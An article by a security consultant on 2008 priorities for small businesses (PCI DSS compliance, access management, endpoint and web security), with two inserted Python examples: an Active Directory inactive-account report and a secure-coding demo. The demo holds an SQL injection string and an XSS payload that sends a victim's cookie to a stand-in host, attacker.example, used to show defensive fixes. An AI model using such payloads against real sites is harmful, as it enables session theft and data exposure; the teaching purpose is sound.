There will be three key information security issues for small and medium-sized businesses (SMBs) in 2008: compliance, application/website security and endpoint security. These three areas will be much more tightly intertwined next year than they were in 2007.
Getting in compliance
SMBs, particularly private companies, may think government regulations are only for publicly traded, usually larger, companies. But that's not always the case. For SMBs servicing public companies, regulators and auditors looking downstream will knock on their doors, too. Compliance with the Sarbanes-Oxley Act (SOX) for public companies, the Health Insurance Portability and Accountability Act (HIPAA) for health care providers, and the Payment Card Industry Data Security Standard (PCI DSS) for companies accepting credit card payments will continue to nag SMBs, just as they do their larger corporate brethren.
What are the big components of compliance? Access management and application and network systems security are all part of the mix. They can't be separated and treated as individual pieces. To be compliant, an SMB will have to satisfy all of these requirements.
Each regulation has its unique twist. While compliance with SOX and HIPAA will continue to be an issue, the red flag for SMBs in 2008 will be PCI DSS. Unlike SOX and HIPAA, which are government regulations, PCI DSS is an industry standard maintained by the PCI Security Standards Council, founded by the five major card brands -- Visa International, MasterCard International Inc., American Express Co., Discover Financial Services LLC and JCB Co. A merchant found not in compliance can be fined (the card brands levy the fine on its acquiring bank, which passes it along) or barred from processing cards through the brands' networks.
Although many parts of PCI DSS affect SMBs directly, the particular pain point in 2008 will be Section 6.6, which governs application security. This section, currently a recommended best practice, becomes a mandatory requirement on June 30, 2008.
Securing applications and websites
Section 6.6 requires all Web-facing applications to be protected from known attacks by one of two methods, both of which could be costly for an SMB. The first is to have all custom application code reviewed for common vulnerabilities by an organization specializing in application security. The second is to install an application-layer firewall in front of the Web applications. The first is costly mainly in staff time and consulting fees, the second in product cost, and an application-layer firewall also needs ongoing tuning: it blocks known attack patterns but leaves the underlying coding flaws in place.
But there are indications the PCI council can live without full-blown reviews of every line of Web application code. Popular Web scanning tools within reach of SMBs, such as WebInspect from SPI Dynamics Inc. (acquired by HP in 2007) and AppScan from Watchfire Corp. (acquired by IBM in 2007), may be adequate. Even though these tools don't review application code, they exercise the running site and can uncover common vulnerabilities such as SQL injection and cross-site scripting. A scanner only finds what it can reach, so scans should be run with valid application credentials, and the reports, together with evidence that each finding was fixed and re-scanned, should be kept for the assessor. If an SMB can demonstrate that it remediates the vulnerabilities those scans uncover, it could pass muster without hiring yet another expensive consultant to review hundreds of thousands of lines of code.
Access management also falls under the compliance umbrella, not only for PCI DSS, but for SOX and HIPAA, too. All of these regulations are sticklers for complete records of who has access to systems, including proof of regular pruning of inactive accounts. This requires the ability to assemble reports at regular intervals that are available for auditors and regulators on demand. For cash-strapped SMBs, the query tools that ship with Active Directory, the directory service most of them already run, can produce these listings at no extra cost: dsquery user -inactive, for example, lists accounts that have not logged on in a given number of weeks, and dsquery user -disabled lists those already turned off.
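The inactive-account report described above, as an added example in Python that is not from the article or from Microsoft: it runs over a constructed list of account records shaped like an Active Directory export (sAMAccountName, userAccountControl, lastLogonTimestamp as Windows FILETIME ticks, whenCreated as an LDAP generalized-time string) and flags enabled accounts idle for more than 90 days. The attribute names and encodings are real AD conventions; the sample accounts, the fixed report date and the 90-day window are assumptions.

```python
from datetime import datetime, timedelta, timezone

# Windows FILETIME: 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
# AD stores lastLogonTimestamp (and pwdLastSet, accountExpires) in this form.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH_FILETIME = 116444736000000000  # 1970-01-01 expressed as FILETIME ticks
ACCOUNTDISABLE = 0x0002                   # userAccountControl bit for a disabled account


def filetime_to_datetime(ticks):
    """Convert a FILETIME integer to an aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime; used here only to build the sample records."""
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def parse_generalized_time(text):
    """Parse AD's whenCreated format, e.g. '20071225120000.0Z'."""
    return datetime.strptime(text, "%Y%m%d%H%M%S.0Z").replace(tzinfo=timezone.utc)


def inactive_accounts(records, now, days=90):
    """Return (sAMAccountName, days_idle) for enabled accounts idle longer than `days`.

    Accounts that have never logged on are measured from whenCreated, so a
    new hire created last week is not reported as stale. Accounts that are
    already disabled are skipped: pruning has been done for them.
    """
    cutoff = now - timedelta(days=days)
    stale = []
    for rec in records:
        if rec["userAccountControl"] & ACCOUNTDISABLE:
            continue
        ticks = rec.get("lastLogonTimestamp", 0)
        if ticks:
            last_seen = filetime_to_datetime(ticks)
        else:
            last_seen = parse_generalized_time(rec["whenCreated"])
        if last_seen < cutoff:
            stale.append((rec["sAMAccountName"], (now - last_seen).days))
    return sorted(stale)


# Constructed sample export (an assumption, not real directory data). The
# report date is fixed so the example is reproducible.
NOW = datetime(2008, 1, 15, 9, 0, tzinfo=timezone.utc)


def _created(days_ago):
    """whenCreated string for an account created `days_ago` days before NOW."""
    return (NOW - timedelta(days=days_ago)).strftime("%Y%m%d%H%M%S.0Z")


SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200,        # normal, enabled
     "lastLogonTimestamp": datetime_to_filetime(NOW - timedelta(days=5)),
     "whenCreated": _created(700)},
    {"sAMAccountName": "oldvendor", "userAccountControl": 0x200,
     "lastLogonTimestamp": datetime_to_filetime(NOW - timedelta(days=200)),
     "whenCreated": _created(900)},
    {"sAMAccountName": "leftco", "userAccountControl": 0x202,      # already disabled
     "lastLogonTimestamp": datetime_to_filetime(NOW - timedelta(days=300)),
     "whenCreated": _created(1000)},
    {"sAMAccountName": "newhire", "userAccountControl": 0x200,     # never logged on, 3 days old
     "lastLogonTimestamp": 0, "whenCreated": _created(3)},
    {"sAMAccountName": "stale_never", "userAccountControl": 0x200, # never logged on, 400 days old
     "lastLogonTimestamp": 0, "whenCreated": _created(400)},
]

if __name__ == "__main__":
    for name, idle in inactive_accounts(SAMPLE_ACCOUNTS, NOW):
        print(f"{name:<12} idle {idle} days -> disable, review, then delete")
```

One caveat that matters for the audit trail: AD only writes lastLogonTimestamp when the stored value is more than about 14 days old, so the attribute can understate an account's activity by up to two weeks. Disable flagged accounts first and delete them after a review period, and keep each dated report as the evidence of pruning that the auditor will ask for.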
Endpoint security to the fore
With the proliferation of remote workers, laptop-toting road warriors and managers with BlackBerrys, endpoint security has become critical for SMBs. This is in addition to the use of USB keys and other pocket-sized portable storage devices that carry presentations and other data for off-site work. All these devices are big cost savers for SMBs, since they reduce the need for expensive office space by allowing employees to work remotely.
But that freedom also comes with serious risks to network security. These devices, if not properly configured, connect directly to the internal network, and the data they carry travels outside it, so the perimeter firewall sees neither; in effect they bypass it. They can both bring malware into the network and take sensitive information or customer data out of it.
Besides configuring remote devices to reach the network only through a firewall or dedicated gateway (a VPN concentrator, for example), each device should be checked before it connects to confirm that it has been sufficiently hardened and is free of malware. In other words, it should be admitted to the network only if its patches and antivirus signatures are current, the check that network access control (NAC) products automate. As for USB keys and other external storage devices, they should be restricted to users who need them for business purposes, or blocked from the enterprise network altogether.
SMB-friendly products in the endpoint security market include Safend Protector from Safend Ltd. and DeviceWall from Centennial Software Ltd. Both products are easy to install and have easy-to-use Web-based interfaces for monitoring and controlling endpoints and devices on the network.
Guard your sites
Web and application security will continue to be a concern for SMBs in 2008. Hackers will continue, as they did in 2007, to go downscale and target smaller companies, which they believe have weaker defenses than larger enterprises with better-staffed security departments. SMBs' websites are just as susceptible to attacks as websites of larger companies through cross-site scripting, SQL injection and session hijacking.
The best defense against Web attacks is to follow secure coding practices, as outlined by the Open Web Application Security Project (OWASP). OWASP guidance is the de facto industry reference for Web security, and PCI DSS Requirement 6.5 points to it directly: custom Web application code must be developed to secure coding guidelines such as OWASP's and must address the OWASP Top Ten classes of vulnerability. Here again, compliance comes up as part of a separate issue, in this case, application security. In addition to safe coding practices, OWASP outlines best practices for secure Web design, such as Web server configuration.
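The three attack classes named in this section, shown as an added example in Python that is not from the article or from OWASP: each vulnerable function is paired with its hardened form, using Python's sqlite3 module over a constructed in-memory customer table. The table contents, the payload strings and the cookie name are assumptions.

```python
import html
import secrets
import sqlite3


def make_db():
    """Constructed sample customer table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO customers (name, email) VALUES (?, ?)",
        [("alice", "alice@example.com"),
         ("bob", "bob@example.com"),
         ("carol", "carol@example.com")],
    )
    return conn


def lookup_customer_unsafe(conn, name):
    """VULNERABLE (SQL injection): the request parameter is spliced into the SQL text."""
    sql = "SELECT name, email FROM customers WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_customer_safe(conn, name):
    """FIXED: a bound parameter can only ever be a value, never part of the query."""
    return conn.execute(
        "SELECT name, email FROM customers WHERE name = ?", (name,)
    ).fetchall()


def greeting_unsafe(display_name):
    """VULNERABLE (cross-site scripting): reflects user text into HTML unencoded."""
    return "<p>Welcome, " + display_name + "</p>"


def greeting_safe(display_name):
    """FIXED: encode for the HTML body context at the point of output."""
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


def new_session_cookie(name="SESSIONID"):
    """Session hijacking defenses: an unguessable ID, HttpOnly so an injected
    script cannot read the cookie, Secure so it never crosses plain HTTP.
    Returns the Set-Cookie header line and the ID it carries."""
    session_id = secrets.token_urlsafe(32)
    return f"Set-Cookie: {name}={session_id}; Path=/; HttpOnly; Secure", session_id


# Constructed attack inputs, the kind a scanner sends to every parameter.
SQLI_PAYLOAD = "' OR '1'='1"
XSS_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = make_db()
    print("unsafe lookup:", lookup_customer_unsafe(db, SQLI_PAYLOAD))  # every row leaks
    print("safe lookup:  ", lookup_customer_safe(db, SQLI_PAYLOAD))    # no match
    print(greeting_unsafe(XSS_PAYLOAD))  # script runs in the victim's browser
    print(greeting_safe(XSS_PAYLOAD))    # rendered as harmless text
    print(new_session_cookie()[0])
```

The unsafe lookup turns `' OR '1'='1` into `WHERE name = '' OR '1'='1'` and returns the whole table; the parameterized version returns nothing because the driver treats the payload as a literal name. The two greeting functions differ only in output encoding, which is exactly the control a scanner is testing for when it reflects a script tag back at the page.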
While 2008 will prove to be another difficult year with plenty of information security issues for SMBs, the challenges won't be insurmountable.
Joel Dubin, CISSP, is an independent computer security consultant. He is a Microsoft MVP, specializing in Web and application security, and is the author of The Little Black Book of Computer Security, available from Amazon.com. He has a regular radio show on computer security on WIIT in Chicago and runs The IT Security Guy blog at www.theitsecurityguy.com.